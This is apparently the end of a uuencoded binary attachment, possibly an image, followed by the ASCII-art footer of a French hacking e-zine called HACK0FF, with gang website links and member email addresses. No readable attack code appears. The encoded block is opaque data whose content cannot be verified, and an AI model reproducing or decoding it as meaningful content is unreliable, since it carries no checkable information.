MI?T`(C&`&(5$NA0I.9%B%&),C0Y%Q3((I0AF)E)1+^%3HD3*\I9$*F1;`H@H
M8N+$:;X;_T@Z.J&H"RG.4%(BRR+%0D"G7>AAA>I03L;)SI:LR$4N:Q%[7B2?
M>Y'ED8;*&\,2$HBE/9*`>0@$$`W"BBPJJT!"8QK65*A)*=63A5Z\2TYF!X@!
M-7)$&)U1%2ZF*5`M%$IR&NGO@E@*'_UA)P;;GMU(Y[D%BM$3.KHF7>XR2;C8
M<R<%VM!P-'FA/+QQJ&`=B3IV)!':C`55PZK23&#BU;"ZU5&S*,>_D@27"7E1
M.*.`X%OWZB9U;(M`O`D@CK@ZEDY\E:^(_4@@6(B6$4G(0:HX1@'O:1*,)/:R
M"5%'1U?B&P@]4IA">YI+1@=9"F+VM`-A!=!JDLQ,?E%ATL)>&/X+E$_4"J0B
M51!JV_SZO\H5,T#U1.'HBB:U02D'M67-0SC`"B*?B:4WSW)2`4<#S@V9926R
M>1!:2G'8H9:$<(F90Q40\QA6:4<QV?$.4IRB!W-@3B&!4*&3DL4;"OEL2`WE
M*AF%\Y*\_2%NNO53<V>BAYW^BRNO8@JXTN=*\FILE4GI+D$D@E6"&<R^+7R6
M2Y@&*O2P)*"Q]:R%3.(CM0%B%;,(L$)`9+<J)&E^[-U.!ONHE7%5Q5N(\981
MO=44<$Q*G[)1*4'+.%_>39)@OJD<`N=)EV8-IX?70TF75#R0>/50.]E9<!,A
M4QDF4L<Q(%R*KE3)F*3H!I1DDF1_.OZ5&BP-[EE9.K(77XC&#,$$5!":34II
M]`<)$T0/UC(AQW!L2I)YF3(EXTQUHLA*K$`F,X2\HEFR":9/FFT4><F+-K5Y
MZ6Q:C$I$L[.Q&$@?EJQBN/_34$]:D@R<]7"C$Y862I[`Q%5%QS&S\C*7N9Q'
MR#01,WBL'ZNL=T4IOX4^!<-IV&SZR;P`QUDX1&-/AR/`U<[FP]A%B5Y9#$,$
ME[(ZDSGT=)J(Q'`G<5:/WHHG1&-?Z\J,-<SB7PP'0R9,P]!93!-1C:`KK6BC
M\#ZUU=E_6+*<1R-QR^JRS@?-36Y<J^]5V[&*82`T'L+84([KA&B*P,8L::O&
M/!1NDCW_X_]JX8`.+:)=6JG@F*C42#PJ4ZD*)JY#F7,Y?-SG>G0HJZ*5I%1A
M-/SQ&GP>RDN(JG-%Z!35@)0]F#P,$U/^C'-:`(KOSYHD'0>CZBBE:"OUD4PQ
M"3[X94Q9*ZC<JLR/>4)8/&$>G,V;-2K)XCIUR1*8\3*=]E*-O+-8FK4TP\Z"
M&]K!AOP'_>'&)<>!2E4T4S(2A])=7*$5N<C^';-[)S&(&28XX3V?AZHS1?8Y
M3][RE@K>_=T9-1.ZOLD2S/,U23@'#!(!53J*:X#(3,]44'YB,]R[^%<\XO'$
M4;H$KL0<T2E4#*_)2L\?<<Y2G2YSF4,7R1ZDIQ-FI'W)+?-F*&/^W?XE-4JA
MDU2]EMI?XQS]*07A&G0]XV)X+7B6\X5>"*;1ZS!40S>G_J=?HA557YTF0BUY
MMRR=,!JNIU5:HAM:PD)YL`H$X6R\<5U2LF'\I4.CXV8_4SED-%4_@B%CU#\"
MQ1JBD2(OXGF]Y'_0IT5+IT/\(6'(4X!`4W4;,@H_=A"LD#0Q97$+%'L1B%*C
M44(HU$.S=RAM-#L6`39:]#4E\EA?LW1Y!TEYXX`+D0ZK$`AZH$U>%3?OI1#6
M,"7(M"ES,1:;EW(P5#<PA3"N4114M5:J<(1?E#+T@5-=,U?95#"F1A@XTF?>
MY2,`@G+UU32H1D86TGLP5%^QU4\6\H6/Y:<@&,=%]D*']?%:LF874HA8G50W
ML/=Z<V%=O(-JG)<PR/!(\X4[V%-)51(ET6)?H7A//&-;).5)G.4UN;.#U90.
MU%,0?S,12L(OA2@<4T5/_E)5=:,'UN"*(6&+>\$*W*4G:[*%(%$2-[$L6W(X
B3>)(+4=BW.6,QGA:2((D)N-(/($SOI$S"F(.?@96`0$`.P
`
end
<-----cut here----->


______________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                               -<\________________________/>-
   ~~    ~~    ~~    ~~    ~~°ºØø¦    ¿<H A C K 0 F F>?   ¦øØº°~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~-</¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\>-~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~    ~ http://come.to/legang  ~~   ~~    ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~   ~~    ~~    ~~     ~~    
   ~~    ~~    ~~    ~~    ~~  http://members.tripod.com/cakeii ~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~    ~~  cakeii@yahoo.com    ~~    ~~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~~    tobozo@biosys.net ~~    ~~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~    ~ sniffdoz@yahoo.com    ~~    ~~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~~  nums@rocketmail.com ~~    ~~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~      yopyop@softhome.net   ~~    ~~    ~~    ~~    ~~    ~~
~~    ~~    ~~    ~~    ~~    ~~    aolshame@softhome.net   ~~    ~~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~    ~~    ~~  emminence@nightmail.com   ~~    ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~~    ~~    ~                       ~~    ~~    ~~    ~~    ~~    ~~
.........Des commentaires, des questions, des insultes, ecrivez aux membres du gang.........
______________________________________________________________________________________________
¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬­®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§¨©ª«¬¡¢£¤¥ ¦§¨©ª«¬­
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
